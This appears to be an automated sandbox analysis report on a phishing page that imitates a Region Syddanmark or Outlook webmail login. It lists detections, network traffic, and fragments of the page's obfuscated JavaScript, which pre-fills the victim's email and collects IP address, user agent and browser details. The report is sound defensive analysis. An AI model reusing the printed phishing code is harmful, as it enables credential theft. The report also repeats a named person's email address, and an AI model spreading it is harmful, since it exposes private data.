Edit tour

Windows Analysis Report
https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dk

Overview

General Information

Sample URL:https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dk
Analysis ID:1650103
Infos:

Detection

HTMLPhisher
Score:88
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains obfuscated javascript
Javascript uses Telegram API
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Javascript checks online IP of machine
URL contains potential PII (phishing indication)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1928,i,13413356600971011480,18213977548615804884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1928,i,13413356600971011480,18213977548615804884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dk" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        0.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkAvira URL Cloud: detection malicious, Label: phishing
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/favicon.icoAvira URL Cloud: Label: phishing

          Phishing

          barindex
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkJoe Sandbox AI: Score: 9 Reasons: The URL contains 'outlook-com' which is a partial match and suspicious as it includes hyphens and extra words., The domain 'pages.dev' is a generic hosting domain and not directly associated with Outlook or Microsoft., The brand 'Region Syddanmark' does not match the URL or the typical use of Outlook, which is a Microsoft product., The presence of input fields for 'Email' and 'Password' is common in phishing sites attempting to harvest credentials. DOM: 0.6.pages.csv
          Source: Yara matchFile source: 0.1.pages.csv, type: HTML
          Source: Yara matchFile source: 0.2.pages.csv, type: HTML
          Source: Yara matchFile source: 0.4.pages.csv, type: HTML
          Source: Yara matchFile source: 0.6.pages.csv, type: HTML
          Source: 0.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://new-session-outlook-com-01262025-veryfing-... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be setting up a chat session with a remote server, potentially for malicious purposes. The use of `document.write()` to inject the script content is also a concerning practice. Overall, this script exhibits a high level of risk and should be thoroughly investigated.
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.devJoe Sandbox AI: The URL 'https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev' appears to be a typosquatting attempt targeting the well-known brand Outlook. The legitimate URL for Outlook is 'https://outlook.com'. The analyzed URL uses a subdomain structure that includes 'outlook-com', which is a common tactic to mimic the legitimate domain. The use of 'veryfing-successfuli' suggests an attempt to create urgency or legitimacy, which is a common phishing tactic. The domain extension '.pages.dev' is not typically associated with Outlook, increasing the likelihood of confusion. The similarity score is high due to the structural mimicry and character-level resemblance to the legitimate brand. The spoofed score is also high, as the URL's structure and content are likely to confuse users into believing it is associated with Outlook.
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: document.write(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%6C%65%74%20%63%68%61%74%5F%69%64%64%20%3D%20
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: let submitcount = 0;document.addeventlistener("domcontentloaded", (() => {const e = new urlsearchparams(window.location.search).get("eta");let t;if (e) {document.getelementbyid("email").value = e;const n = e.split("@");if (2 === n.length) {const e = n[1];t = e, document.getelementbyid("domain-favicon").src = `https://www.google.com/s2/favicons?domain=${e}`;const o = e.split(".")[0].touppercase();document.getelementbyid("domain-name").textcontent = o;const r = e.startswith("http://") || e.startswith("https://") ? e : `https://${e}`;document.getelementbyid("background-iframe").src = r}} else console.warn("no 'eta' parameter found in the url."), document.getelementbyid("background-iframe").src = "about:blank";let n = {ipaddress: "fetching...",useragent: navigator.useragent,timezone: intl.datetimeformat().resolvedoptions().timezone,browser: "detecting..."};const o = navigator.useragent;o.indexof("firefox") > -1 ? n.browser = "mozilla firefox" : o.i...
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: Number of links: 0
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: Title: secured webmail does not match URL
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: let submitcount = 0;document.addeventlistener("domcontentloaded", (() => {const e = new urlsearchparams(window.location.search).get("eta");let t;if (e) {document.getelementbyid("email").value = e;const n = e.split("@");if (2 === n.length) {const e = n[1];t = e, document.getelementbyid("domain-favicon").src = `https://www.google.com/s2/favicons?domain=${e}`;const o = e.split(".")[0].touppercase();document.getelementbyid("domain-name").textcontent = o;const r = e.startswith("http://") || e.startswith("https://") ? e : `https://${e}`;document.getelementbyid("background-iframe").src = r}} else console.warn("no 'eta' parameter found in the url."), document.getelementbyid("background-iframe").src = "about:blank";let n = {ipaddress: "fetching...",useragent: navigator.useragent,timezone: intl.datetimeformat().resolvedoptions().timezone,browser: "detecting..."};const o = navigator.useragent;o.indexof("firefox") > -1 ? n.browser = "mozilla firefox" : o.i...
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkSample URL: PII: dorte.moeller.jensen@rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: Iframe src: https://rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: Iframe src: https://rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: Iframe src: https://rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: Iframe src: https://rsyd.dk
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: <input type="password" .../> found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No favicon
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No favicon
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No favicon
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No favicon
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="author".. found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="author".. found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="author".. found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="author".. found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="copyright".. found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="copyright".. found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="copyright".. found
          Source: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.163.231.69:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.163.231.69:443 -> 192.168.2.16:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.48.224.102:443 -> 192.168.2.16:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.27.152:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.27.152:443 -> 192.168.2.16:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.223.209.5:443 -> 192.168.2.16:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.163.231.69:443 -> 192.168.2.16:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.223.209.69:443 -> 192.168.2.16:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.105.146:443 -> 192.168.2.16:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.223.209.5:443 -> 192.168.2.16:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.156.103.95:443 -> 192.168.2.16:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.190.93.146:443 -> 192.168.2.16:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.91.45:443 -> 192.168.2.16:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.27.152:443 -> 192.168.2.16:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.158.47.86:443 -> 192.168.2.16:49779 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.91.45:443 -> 192.168.2.16:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.190.93.146:443 -> 192.168.2.16:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 34.98.91.45:443 -> 192.168.2.16:49786 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49793 version: TLS 1.2
          Source: chrome.exeMemory has grown: Private usage: 1MB later: 42MB
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
          Source: global trafficHTTP traffic detected: GET /newsession?eta=dorte.moeller.jensen@rsyd.dk HTTP/1.1Host: new-session-outlook-com-01262025-veryfing-successfuli.pages.devConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.3.0/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/bootstrap-icons@1.10.5/font/bootstrap-icons.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=zoho.com HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=rsyd.dk HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rsyd.dkConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /uc.js HTTP/1.1Host: consent.cookiebot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/92/12437-3/cludo-search-nyhedsarkiv.min.css HTTP/1.1Host: customer.cludo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/92/12437-3/cludo-search-main.min.css HTTP/1.1Host: customer.cludo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
